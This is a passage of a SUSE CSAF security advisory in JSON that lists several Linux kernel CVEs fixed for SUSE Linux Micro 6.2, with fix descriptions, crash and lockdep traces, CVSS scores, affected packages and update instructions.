"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40261"
},
{
"cve": "CVE-2025-40363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: fix field-spanning memcpy warning in AH output\n\nFix field-spanning memcpy warnings in ah6_output() and\nah6_output_done() where extension headers are copied to/from IPv6\naddress fields, triggering fortify-string warnings about writes beyond\nthe 16-byte address fields.\n\n memcpy: detected field-spanning write (size 40) of single field \"\u0026top_iph-\u003esaddr\" at net/ipv6/ah6.c:439 (size 16)\n WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439\n\nThe warnings are false positives as the extension headers are\nintentionally placed after the IPv6 header in memory. Fix by properly\ncopying addresses and extension headers separately, and introduce\nhelper functions to avoid code duplication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40363",
"url": "https://www.suse.com/security/cve/CVE-2025-40363"
},
{
"category": "external",
"summary": "SUSE Bug 1255102 for CVE-2025-40363",
"url": "https://bugzilla.suse.com/1255102"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-40363"
},
{
"cve": "CVE-2025-68174",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68174"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: enhance kfd process check in switch partition\n\ncurrent switch partition only check if kfd_processes_table is empty.\nkfd_prcesses_table entry is deleted in kfd_process_notifier_release, but\nkfd_process tear down is in kfd_process_wq_release.\n\nconsider two processes:\n\nProcess A (workqueue) -\u003e kfd_process_wq_release -\u003e Access kfd_node member\nProcess B switch partition -\u003e amdgpu_xcp_pre_partition_switch -\u003e amdgpu_amdkfd_device_fini_sw\n-\u003e kfd_node tear down.\n\nProcess A and B may trigger a race as shown in dmesg log.\n\nThis patch is to resolve the race by adding an atomic kfd_process counter\nkfd_processes_count, it increment as create kfd process, decrement as\nfinish kfd_process_wq_release.\n\nv2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds\nand bug fix. (Philip Yang)\n\n[3966658.307702] divide error: 0000 [#1] SMP NOPTI\n[3966658.350818] i10nm_edac\n[3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted\n[3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu]\n[3966658.362839] nfit\n[3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu]\n[3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 \u003cf7\u003e be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00\n[3966658.380967] x86_pkg_temp_thermal\n[3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246\n[3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000\n[3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00\n[3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4\n[3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000\n[3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800\n[3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000\n[3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0\n[3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[3966658.391536] PKRU: 55555554\n[3966658.391536] Call Trace:\n[3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu]\n[3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu]\n[3966658.399754] intel_powerclamp\n[3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu]\n[3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu]\n[3966658.410516] coretemp\n[3966658.434016] process_one_work+0x1ad/0x380\n[3966658.434021] worker_thread+0x49/0x310\n[3966658.438963] kvm_intel\n[3966658.446041] ? process_one_work+0x380/0x380\n[3966658.446045] kthread+0x118/0x140\n[3966658.446047] ? __kthread_bind_mask+0x60/0x60\n[3966658.446050] ret_from_fork+0x1f/0x30\n[3966658.446053] Modules linked in: kpatch_20765354(OEK)\n[3966658.455310] kvm\n[3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK)\n[3966658.473462] idxd_mdev\n[3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68174",
"url": "https://www.suse.com/security/cve/CVE-2025-68174"
},
{
"category": "external",
"summary": "SUSE Bug 1255327 for CVE-2025-68174",
"url": "https://bugzilla.suse.com/1255327"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68174"
},
{
"cve": "CVE-2025-68178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix possible deadlock while configuring policy\n\nFollowing deadlock can be triggered easily by lockdep:\n\nWARNING: possible circular locking dependency detected\n6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted\n------------------------------------------------------\ncheck/1334 is trying to acquire lock:\nff1100011d9d0678 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180\n\nbut task is already holding lock:\nff1100011d9d00e0 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #2 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}:\n blk_queue_enter+0x40b/0x470\n blkg_conf_prep+0x7b/0x3c0\n tg_set_limit+0x10a/0x3e0\n cgroup_file_write+0xc6/0x420\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n-\u003e #1 (\u0026q-\u003erq_qos_mutex){+.+.}-{4:4}:\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n wbt_init+0x17e/0x280\n wbt_enable_default+0xe9/0x140\n blk_register_queue+0x1da/0x2e0\n __add_disk+0x38c/0x5d0\n add_disk_fwnode+0x89/0x250\n device_add_disk+0x18/0x30\n virtblk_probe+0x13a3/0x1800\n virtio_dev_probe+0x389/0x610\n really_probe+0x136/0x620\n __driver_probe_device+0xb3/0x230\n driver_probe_device+0x2f/0xe0\n __driver_attach+0x158/0x250\n bus_for_each_dev+0xa9/0x130\n driver_attach+0x26/0x40\n bus_add_driver+0x178/0x3d0\n driver_register+0x7d/0x1c0\n __register_virtio_driver+0x2c/0x60\n virtio_blk_init+0x6f/0xe0\n do_one_initcall+0x94/0x540\n kernel_init_freeable+0x56a/0x7b0\n kernel_init+0x2b/0x270\n ret_from_fork+0x268/0x4c0\n ret_from_fork_asm+0x1a/0x30\n\n-\u003e #0 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}:\n __lock_acquire+0x1835/0x2940\n lock_acquire+0xf9/0x450\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n blk_unregister_queue+0x53/0x180\n __del_gendisk+0x226/0x690\n del_gendisk+0xba/0x110\n sd_remove+0x49/0xb0 [sd_mod]\n device_remove+0x87/0xb0\n device_release_driver_internal+0x11e/0x230\n device_release_driver+0x1a/0x30\n bus_remove_device+0x14d/0x220\n device_del+0x1e1/0x5a0\n __scsi_remove_device+0x1ff/0x2f0\n scsi_remove_device+0x37/0x60\n sdev_store_delete+0x77/0x100\n dev_attr_store+0x1f/0x40\n sysfs_kf_write+0x65/0x90\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nother info that might help us debug this:\n\nChain exists of:\n \u0026q-\u003esysfs_lock --\u003e \u0026q-\u003erq_qos_mutex --\u003e \u0026q-\u003eq_usage_counter(queue)#3\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003erq_qos_mutex);\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003esysfs_lock);\n\nRoot cause is that queue_usage_counter is grabbed with rq_qos_mutex\nheld in blkg_conf_prep(), while queue should be freezed before\nrq_qos_mutex from other context.\n\nThe blk_queue_enter() from blkg_conf_prep() is used to protect against\npolicy deactivation, which is already protected with blkcg_mutex, hence\nconvert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile,\nconsider that blkcg_mutex is held after queue is freezed from policy\ndeactivation, also convert blkg_alloc() to use GFP_NOIO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
